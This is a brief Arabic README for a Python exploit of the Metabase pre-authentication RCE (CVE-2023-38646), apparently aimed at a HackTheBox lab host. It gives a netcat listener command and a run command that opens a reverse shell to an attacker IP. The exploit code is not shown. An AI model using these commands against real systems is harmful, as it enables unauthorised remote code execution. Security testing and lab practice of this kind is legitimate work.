
# استغلال Python لثغرة Metabase RCE قبل المصادقة (CVE-2023-38646) ينشئ قشرة عكسية لاختبارات الأمان المصرح بها.
⚠️ لأغراض تعليمية وأبحاث أمنية مصرح بها فقط
ممتن جدًا لمؤلف الإثبات الأولي securezeron
قم بإعداد المستمع على جهاز المهاجم:
nc -nlvp 4444
ثم، قم بتشغيل هذا الأمر:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
